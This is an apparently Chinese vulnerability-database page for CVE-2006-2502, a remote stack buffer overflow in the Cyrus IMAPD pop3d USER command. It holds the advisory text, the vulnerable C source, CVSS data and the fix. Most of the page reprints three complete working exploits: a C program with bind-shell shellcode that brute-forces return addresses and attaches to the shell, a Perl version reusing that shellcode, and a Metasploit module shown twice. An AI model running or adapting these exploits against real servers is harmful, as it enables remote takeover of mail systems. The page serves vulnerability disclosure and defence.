CVE-2006-2502
CVSS5.1
发布时间 :2006-05-22 12:06:00
修订时间 :2011-03-07 21:36:19
NMCOEP    

[原文]Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.


[CNNVD]Cyrus IMAPD POP3D 远程栈溢出漏洞(CNNVD-200605-385)

        Cyrus IMAP Server是一款免费开放源代码Interactive Mail Access Protocol (IMAP)协议实现,可使用在Unix和Linux操作系统下。
        Cyrus-imapd的pop3d中存在远程溢出漏洞。如果在imapd.conf中Cyrus-imapd将popsubfolders设置为1的话,则攻击者就可以通过向远程pop3d发送超长的USER命令参数触发栈溢出。
        在cyrus-imapd-2.3.2/imap/pop3d.c中,每次向pop3 server提供USER命令时都会调用pop3d_canon_user,ulen=0。在char userbuf[MAX_MAILBOX_NAME+1], *p;
        ...
        if (!ulen) ulen = strlen(user);
        ...
        memcpy(userbuf, user, ulen);
         userbuf[ulen] = '\0';
        
        这个例程中没有执行长度检查,如果user大于MAX_MAILBOX_NAME+1的话,memcpy就会溢出userbuf缓冲区。
        --- snip ---static int popd_canon_user(sasl_conn_t *conn, void *context,
         const char *user, unsigned ulen,
         unsigned flags, const char *user_realm,
         char *out, unsigned out_max, unsigned *out_ulen)
        {
         char userbuf[MAX_MAILBOX_NAME+1], *p;
         size_t n;
         int r;
         if (!ulen) ulen = strlen(user);
         if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
         /* make a working copy of the auth[z]id */
         memcpy(userbuf, user, ulen);
         userbuf[ulen] = '\0';
         user = userbuf;
         /* See if we're trying to access a subfolder */
         if ((p = strchr(userbuf, '+'))) {
         n = config_virtdomains ? strcspn(p, "@") : strlen(p);
         if (flags & SASL_CU_AUTHZID) {
         /* make a copy of the subfolder */
         if (popd_subfolder) free(popd_subfolder);
         popd_subfolder = xstrndup(p, n);
         }
         /* strip the subfolder from the auth[z]id */
         memmove(p, p+n, strlen(p+n)+1);
         ulen -= n;
         }
         }
         r = mysasl_canon_user(conn, context, user, ulen, flags, user_realm,
         out, out_max, out_ulen);
         if (!r & & popd_subfolder & & flags == SASL_CU_AUTHZID) {
         /* If we're only doing the authzid, put back the subfolder
         in case its used in the challenge/response calculation */
         n = strlen(popd_subfolder);
         if (*out_ulen + n > out_max) {
         sasl_seterror(conn, 0, "buffer overflow while canonicalizing");
         r = SASL_BUFOVER;
         }
         else {
         p = (config_virtdomains & & (p = strchr(out, '@'))) ?
         p : out + *out_ulen;
         memmove(p+n, p, strlen(p)+1);
         memcpy(p, popd_subfolder, n);
         *out_ulen += n;
         }
         }
         return r;
        }
        --- snip ---
        

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2502
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2502
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-385
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1891
(UNKNOWN)  VUPEN  ADV-2006-1891
http://www.securityfocus.com/bid/18056
(UNKNOWN)  BID  18056
http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html
(UNKNOWN)  FULLDISC  20060521 Cyrus IMAPD pop3d remote compromise aka cyrusFUCK3d
http://xforce.iss.net/xforce/xfdb/26578
(UNKNOWN)  XF  cyrus-imap-pop3d-bo(26578)
http://securitytracker.com/id?1016131
(UNKNOWN)  SECTRACK  1016131

- 漏洞信息

Cyrus IMAPD POP3D 远程栈溢出漏洞
中危 缓冲区溢出
2006-05-22 00:00:00 2006-05-22 00:00:00
远程  
        Cyrus IMAP Server是一款免费开放源代码Interactive Mail Access Protocol (IMAP)协议实现,可使用在Unix和Linux操作系统下。
        Cyrus-imapd的pop3d中存在远程溢出漏洞。如果在imapd.conf中Cyrus-imapd将popsubfolders设置为1的话,则攻击者就可以通过向远程pop3d发送超长的USER命令参数触发栈溢出。
        在cyrus-imapd-2.3.2/imap/pop3d.c中,每次向pop3 server提供USER命令时都会调用pop3d_canon_user,ulen=0。在char userbuf[MAX_MAILBOX_NAME+1], *p;
        ...
        if (!ulen) ulen = strlen(user);
        ...
        memcpy(userbuf, user, ulen);
         userbuf[ulen] = '\0';
        
        这个例程中没有执行长度检查,如果user大于MAX_MAILBOX_NAME+1的话,memcpy就会溢出userbuf缓冲区。
        --- snip ---static int popd_canon_user(sasl_conn_t *conn, void *context,
         const char *user, unsigned ulen,
         unsigned flags, const char *user_realm,
         char *out, unsigned out_max, unsigned *out_ulen)
        {
         char userbuf[MAX_MAILBOX_NAME+1], *p;
         size_t n;
         int r;
         if (!ulen) ulen = strlen(user);
         if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
         /* make a working copy of the auth[z]id */
         memcpy(userbuf, user, ulen);
         userbuf[ulen] = '\0';
         user = userbuf;
         /* See if we're trying to access a subfolder */
         if ((p = strchr(userbuf, '+'))) {
         n = config_virtdomains ? strcspn(p, "@") : strlen(p);
         if (flags & SASL_CU_AUTHZID) {
         /* make a copy of the subfolder */
         if (popd_subfolder) free(popd_subfolder);
         popd_subfolder = xstrndup(p, n);
         }
         /* strip the subfolder from the auth[z]id */
         memmove(p, p+n, strlen(p+n)+1);
         ulen -= n;
         }
         }
         r = mysasl_canon_user(conn, context, user, ulen, flags, user_realm,
         out, out_max, out_ulen);
         if (!r & & popd_subfolder & & flags == SASL_CU_AUTHZID) {
         /* If we're only doing the authzid, put back the subfolder
         in case its used in the challenge/response calculation */
         n = strlen(popd_subfolder);
         if (*out_ulen + n > out_max) {
         sasl_seterror(conn, 0, "buffer overflow while canonicalizing");
         r = SASL_BUFOVER;
         }
         else {
         p = (config_virtdomains & & (p = strchr(out, '@'))) ?
         p : out + *out_ulen;
         memmove(p+n, p, strlen(p)+1);
         memcpy(p, popd_subfolder, n);
         *out_ulen += n;
         }
         }
         return r;
        }
        --- snip ---
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://asg.web.cmu.edu/cyrus/

- 漏洞信息 (1813)

Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (EDBID:1813)
linux remote
2006-05-21 Verified
110 Kingcope
N/A [点击下载]
/* zeroday warez
 * !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
 *********************************************
 * cyruspop3d.c - cyrus pop3d remote exploit by kcope
 * tested on cyrus-imapd-2.3.2,linux
 *
 * bug found 23 Apr 2006 by kcope
 *--------------------------------------------
 *
 * imapd/pop3d.c line 1830 :
 * char userbuf[MAX_MAILBOX_NAME+1], *p;
 * ...
 * if (!ulen) ulen = strlen(user);
 *   if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
 *    memcpy(userbuf, user, ulen);
 *    userbuf[ulen] = '\0';
 * ...
 * popsubfolders has to be enabled
 *
 * thnx to blackzero revoguard wY! qobaiashi bogus alex
 * Love to Lisa :-)
 *********************************************
 * !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>

#define POP3PORT 110
#define BINDPORT 13370

unsigned char shellcode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";

int do_connect (char *remotehost, int port)
{
   static struct hostent *host;
   static struct sockaddr_in addr;
   static int done=0;
   int s;

   if (!inet_aton(remotehost, &addr.sin_addr) && (done != 1))
   {
       host = gethostbyname(remotehost);
       if (!host)
       {
           perror("gethostbyname() failed");
           return -1;
       }
       addr.sin_addr = *(struct in_addr*)host->h_addr;
   }

   s = socket(PF_INET, SOCK_STREAM, 0);
   if (s == -1)
   {
       close(s);
       perror("socket() failed");
       return -1;
   }

   addr.sin_port = htons(port);
   addr.sin_family = AF_INET;

   if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
   {
       close(s);
       if (port == POP3PORT) perror("connect() failed");
       return -1;
   }

   done=1;
   return s;
}

void do_exploit(int sock, unsigned int returnaddr)
{
   char nops[360];
   char nops2[100];
   char exploitbuffer[1024];
   char recvbuf[30];

   memset(&nops[0], '\0', sizeof(nops));
   memset(&nops[0], 'A', 352);
   memset(&nops2[0], '\0', sizeof(nops2));
   memset(&nops2[0], 'A', 90);

   while (1) {
       recv(sock, recvbuf, 1, 0);
       if ((recvbuf[0] == '\r') || (recvbuf[0] == '\n')) break;
   }

   sprintf(exploitbuffer, "USER %s%s%s\r\n", nops, shellcode, nops2);

   exploitbuffer[strlen(exploitbuffer)-1] = (returnaddr >> 24) & 0xff;
   exploitbuffer[strlen(exploitbuffer)-2] = (returnaddr >> 16) & 0xff;
   exploitbuffer[strlen(exploitbuffer)-3] = (returnaddr >> 8) & 0xff;
   exploitbuffer[strlen(exploitbuffer)-4] = (returnaddr) & 0xff;

   send(sock, exploitbuffer, strlen(exploitbuffer), 0);
   recv(sock, recvbuf, sizeof(recvbuf)-1, 0);
}

int do_checkvulnerable(int sock) {
   char checkbuffer[1024];
   char recvbuffer[10];

   memset(&checkbuffer[0], '\0', sizeof(checkbuffer)-1);
   memset(&checkbuffer[0], 'A', sizeof(checkbuffer)-2);
   checkbuffer[0]='U';
   checkbuffer[1]='S';
   checkbuffer[2]='E';
   checkbuffer[3]='R';
   checkbuffer[4]=' ';
   checkbuffer[sizeof(checkbuffer)-3]='\r';
   checkbuffer[sizeof(checkbuffer)-2]='\n';

   while (1) {
       recv(sock, recvbuffer, 1, 0);
       if ((recvbuffer[0] == '\r') || (recvbuffer[0] == '\n')) break;
   }

   send(sock, checkbuffer, strlen(checkbuffer), 0);

   if (recv(sock, recvbuffer, sizeof(recvbuffer)-1, MSG_WAITALL) < 3)
       return 0;

   return -1;
}

int do_remote_shell(int sockfd)
{
   while(1)
        {
           fd_set fds;
           FD_ZERO(&fds);
           FD_SET(0,&fds);
           FD_SET(sockfd,&fds);
           if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
           {
              int cnt;
              char buf[1024];
              if(FD_ISSET(0,&fds))
              {
                 if((cnt=read(0,buf,1024))<1)
                 {
                    if(errno==EWOULDBLOCK||errno==EAGAIN)
                      continue;
                    else
                      break;
                 }
                 write(sockfd,buf,cnt);
              }
              if(FD_ISSET(sockfd,&fds))
              {
                 if((cnt=read(sockfd,buf,1024))<1)
                 {
                      if(errno==EWOULDBLOCK||errno==EAGAIN)
                        continue;
                      else
                        break;
                 }
                 write(1,buf,cnt);
              }
           }
        }
}

int main(int argc, char **argv)
{
   char remotehost[255];
   int s,s2,i;
   unsigned int returnaddr;

   printf("cyrus pop3d remote exploit [kcope/2006]\n");

   if (argc < 3) {
       printf("usage: %s <remote host> <brute force start return address>\n", argv[0]);
       printf("eg: %s localhost bfffa000\n", argv[0]);
       return 1;
   }

   strcpy(remotehost, argv[1]); //uhoho
   if (sscanf(argv[2], "%8x", &returnaddr) == 0) {
       printf("Specify valid start return address\n");
       return 1;
   }

   printf("Checking if vulnerable... ");
   s=do_connect(remotehost, POP3PORT);
   if (do_checkvulnerable(s) == -1) {
       close(s);
       printf("\ncyrus pop3d seems not to be vulnerable\nno popsubfolders defined at remote host?\n");
       return 1;
   }
   close(s);
   printf("SUCCESS!\n");

   while (returnaddr < 0xbfffffff) {
       returnaddr+=16;

       printf("CRACKADDR = %4x\n", returnaddr);
       fflush(stdout);
       s=do_connect(remotehost, POP3PORT);
       if (s==-1)
           return 1;

       do_exploit(s, returnaddr);
       for (i=0;i<2;i++) {
           if ((s2=do_connect(remotehost, BINDPORT)) != -1) {
               printf("\nALEX,ALEX WE GOT IT!!!\n");
               do_remote_shell(s2);
               return 0;
           }
           close(s2);
       }

       close(s);
   }

   return 0;
}

// milw0rm.com [2006-05-21]
		

- 漏洞信息 (2185)

Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3) (EDBID:2185)
linux remote
2006-08-14 Verified
110 K-sPecial
N/A [点击下载]
#!/usr/bin/perl
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
## 
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
##  exploits and not either of them worked (not that they don't but coding my own is generaly faster
##  and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy
##  unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting...
##  realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
##  when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before
##  the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have
##  done here is used the same method, yet found a data area that is not going to freak pop3d
##  out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled
##  'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving. 
##
## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that
##  is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something
##  that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
##  shellcode (because it'll segfault and won't get executed).
##
## Note: bindport is 13370
#################################################################################################################
use IO::Socket;
use strict;

my $host = $ARGV[0] || help();
my $offset = $ARGV[1] || help();
my $port = 110;

# stollen from cyruspop3d.c because this actualy worked, i couldn't get any
# metasploit sc to work (as usualy, hmph)
my $shellcode = 
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96".
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56".
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1".
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0".
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53".
"\x89\xe1\xcd\x80";

my $sock = IO::Socket::INET->new('PeerAddr' => $host,
                                 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n");

$sock->autoflush();

print $sock "USER ";                       ## begin USER command with just that
print $sock "$shellcode";                  ## shellcode is *userbuf is *user
print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out
print $sock "\n";                          ## that simple

sub help {
	print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n";
	print "08/12/2006\n\n";
	print "perl $0 \$host \$offset\n\n";
	
	print "Offsets: \n";
	print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n";

	exit(0);
}

# milw0rm.com [2006-08-14]
		

- 漏洞信息 (16836)

Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow (EDBID:16836)
linux remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: cyrus_pop3d_popsubfolders.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',
			'Description'    => %q{
					This exploit takes advantage of a stack based overflow.  Once the stack
				corruption has occured it is possible to overwrite a pointer which is
				later used for a memcpy. This gives us a write anything anywhere condition
				similar to a format string vulnerability.

				NOTE: The popsubfolders option is a non-default setting.

				I chose to overwrite the GOT with my shellcode and return to it. This
				defeats the VA random patch and possibly other stack protection features.

				Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with
				a version containing the vulnerable code, it is not exploitable due to the
				use of the FORTIFY_SOURCE compiler enhancement
			},
			'Author'         => [ 'bannedit', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2006-2502' ],
					[ 'OSVDB', '25853' ],
					[ 'BID', '18056' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/2053' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/2185' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html' ],
				],
			'Payload'	=>
				{
					'Space'	=> 250,
					'DisableNops' => true,
				},
			'Platform'	=> 'linux',
			'Targets'	=>
				[
					# bannedit: 0x080fd204
					# K-sPecial: 0x8106c20 (debian 3.1 - 2.6.16-rc6)
					[ 'Gentoo 2006.0 Linux 2.6', { 'Ret' => 0x080fd318 } ],
				],
			'Privileged'		=> true,
			'DisclosureDate'	=> 'May 21 2006',
			'DefaultTarget'	=> 0))

		register_options( [ Opt::RPORT(110) ], self.class )
	end



	def exploit

		connect

		print_status "Banner: #{banner = sock.gets}"

		# NOTE: orig poc shellcode len: 84

		# kcope: 352+84+86+4 (nops,sc,nops,ret)
		# K-sPecial: 84+(120*4) (sc,addrs)
		# bannedit: 265+8+250+29+16
		shellcode = payload.encoded

		buf = "USER "
		buf << make_nops(265)
		# return address
		buf << [target.ret].pack('V') * 2
		buf << make_nops(250 - shellcode.length)
		buf << shellcode
		buf << make_nops(29)
		sc_addr = target.ret - 277
		buf << [sc_addr].pack('V') * 4
		buf << "\r\n"

		sock.send(buf, 0)
		disconnect

	end

end
		

- 漏洞信息 (F84584)

Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow (PacketStormID:F84584)
2009-12-31 00:00:00
bannedit,jduck  metasploit.com
exploit,overflow
CVE-2006-2502
[点击下载]

This exploit takes advantage of a stack based overflow. Once the stack corruption has occurred it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',
			'Description'    => %q{
					This exploit takes advantage of a stack based overflow.  Once the stack 
				corruption has occured it is possible to overwrite a pointer which is
				later used for a memcpy. This gives us a write anything anywhere condition 
				similar to a format string vulnerability.

				NOTE: The popsubfolders option is a non-default setting.

				I chose to overwrite the GOT with my shellcode and return to it. This 
				defeats the VA random patch and possibly other stack protection features.

				Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with
				a version containing the vulnerable code, it is not exploitable due to the
				use of the FORTIFY_SOURCE compiler enhancement
			},
			'Author'         => [ 'bannedit', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7884 $',
			'References'     =>
				[
					[ 'CVE', '2006-2502' ],
					[ 'OSVDB', '25853' ],
					[ 'BID', '18056' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/2053' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/2185' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html' ],
				],
			'Payload'	=>
				{
					'Space'	=> 250,
					'DisableNops' => true,
				},
			'Platform'	=> 'linux',
			'Targets'	=>
				[
					# bannedit: 0x080fd204
					# K-sPecial: 0x8106c20 (debian 3.1 - 2.6.16-rc6)
					[ 'Gentoo 2006.0 Linux 2.6', { 'Ret' => 0x080fd318 } ],
				],
			'Privileged'		=> true,
			'DisclosureDate'	=> 'May 21 2006',
			'DefaultTarget'	=> 0))

		register_options( [ Opt::RPORT(110) ], self.class )
	end



	def exploit
	 
		connect

		print_status "Banner: #{banner = sock.gets}"

		# NOTE: orig poc shellcode len: 84
		
		# kcope: 352+84+86+4 (nops,sc,nops,ret)
		# K-sPecial: 84+(120*4) (sc,addrs)
		# bannedit: 265+8+250+29+16
		shellcode = payload.encoded
		
		buf = "USER "
		buf << make_nops(265)
		# return address
		buf << [target.ret].pack('V') * 2
		buf << make_nops(250 - shellcode.length)
		buf << shellcode
		buf << make_nops(29)
		sc_addr = target.ret - 277
		buf << [sc_addr].pack('V') * 4
		buf << "\r\n"

		sock.send(buf, 0)
		disconnect

	end

end
    

- 漏洞信息

25853
Cyrus IMAPD pop3d USER Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

Cyrus IMAPD contains an overflow condition in the pop3d service. The issue is triggered as user-supplied input to the USER command is not properly validated. With a specially crafted request, a remote attacker can cause a stack-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.

- 时间线

2006-05-21 Unknow
2006-05-21 Unknow

- 解决方案

Upgrade to version 2.3.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站